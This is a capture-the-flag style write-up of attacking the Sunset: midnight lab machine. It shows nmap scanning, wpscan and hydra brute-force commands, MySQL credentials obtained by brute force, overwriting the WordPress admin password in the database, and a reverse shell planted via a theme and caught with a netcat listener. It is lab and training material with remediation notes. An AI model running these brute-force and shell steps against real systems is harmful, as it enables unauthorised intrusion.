## Version 1.4.1
## language: en

Feature:
  TOE:
    Sunset: midnight
  Category:
    Brute Force
  Location:
    http://sunset-midnight/
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.237: https://fluidattacks.com/web/rules/237/
  Goal:
    Take advantage of the web service to get shell
  Recommendation:
    Restrict the number of attempts to connect to the system

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | Hydra             |  9.0       |
    | Wpscan            |  3.8.2     |
    | Netcat            |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    And in the description it says the following:
    """
    Important!: Before auditing this machine make sure you add the host
    "sunset-midnight" to your /etc/hosts file, otherwise it may not work
    as expected.
    """
    Then I run it on virtualbox
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 15:53 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.017s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.0061s latency).
    Nmap scan report for sunset-midnight (192.168.1.66)
    Host is up (0.0050s latency).
    Nmap scan report for 192.168.1.67
    Host is up (0.0050s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.0019s latency).
    Nmap done: 256 IP addresses (5 hosts up) scanned in 6.54 seconds
    """
    Then I determined that the ip of the machine is 192.168.1.66
    And as the description indicates, I added sunset-midnight to hosts
    """
    $ vim /etc/hosts
    127.0.0.1       localhost
    127.0.1.1       kali
    192.168.1.66    sunset-midnight

    # The following lines are desirable for IPv6 capable hosts
    ::1     localhost ip6-localhost ip6-loopback
    ff02::1 ip6-allnodes
    ff02::2 ip6-allrouters
    """
    Then I scanned the ip and found it has 3 open ports
    """
    $ nmap 192.168.1.66
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 16:04 -05
    Nmap scan report for sunset-midnight (192.168.1.66)
    Host is up (0.00058s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql

    Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
    """

  Scenario: Normal use case
    Given I access http://sunset-midnight/
    Then I see a simple website [evidences](simpl.png)
    And I can see its blog or contact them, just that

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    Then I saw something interesting
    And it is that the web its CMS is WordPress
    """
    User-agent: *
    Disallow: /wp-admin/
    Allow: /wp-admin/admin-ajax.php
    """
    Then when I thought it might be using an outdated version
    And that contains some vulnerability
    Then to analyze it, I used the wpscan tool [evidences](wpscan.png)
    """
    $ wpscan --url http://sunset-midnight
    ...
    ...
    [+] Finished: Thu Aug 20 16:38:50 2020
    [+] Requests Done: 53
    [+] Cached Requests: 6
    [+] Data Sent: 12.571 KB
    [+] Data Received: 113.187 KB
    [+] Memory used: 206.477 MB
    [+] Elapsed time: 00:00:10
    """
    And I didn't find anything interesting there
    Then I tried to log into the admin panel with default credentials
    And I found out the "admin" user exists on the server [evidences](adm.png)
    Then I thought about brute force the login with that user
    And to brute force it, I used the wpscan tool [evidences](brutewp.png)
    """
    $ wpscan --url http://sunset-midnight --passwords
    /usr/share/wordlists/rockyou.txt --usernames admin
    """
    Then after more than 100k unsuccessful attempts, I decided to change vector
    And seeing the port 3306 open I decided to attack there
    Then I did a brute force attack with hydra [evidences](hydra.png)
    """
    $ hydra -l root -P /usr/share/wordlist/rockyou.txt 192.168.1.66 mysql
    """
    And I successfully got the DBMS credentials
    """
    user: root
    password: robert
    """
    Then my idea was to get the wordpress admin user and log into
    And after identifying the wp_users table [evidences](tables.png)
    Then I came across an admin user and an encrypted password
    """
    $P$BaWk4oeAmrdn453hR606BvDqoF9yy6/
    """
    Then identifying the hash as "MD5 Wordpress"
    And not being able to decrypt it
    Then I inserted in a new user to the database [evidences](insertwp.png)
    And having no administrative rights I decided to update the admin user
    Then I encrypted the word "test" with MD5 wordpress
    And I updated the table [evidences](update.png)
    Then I managed to log in with [evidences](adminwp.png)
    """
    user: admin
    password: test
    """
    Then here the idea is to upload a reverse shell and connect to it
    Then the technique that I used to upload the shell was to download a theme
    And replace a file with the reverse shell
    Then install the theme [evidences](modify.png)
    And ready
    Then I put netcat on listen and connect to the shell [evidences](woooo.png)
    """
    $ nc -lnvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.67] from (UNKNOWN) [192.168.1.66] 38414
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $
    """

  Scenario: Remediation
    Update WordPress CMS to the latest version provided by the vendor
    And avoid brute force attacks

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.6/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environment
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date {2020-08-20}
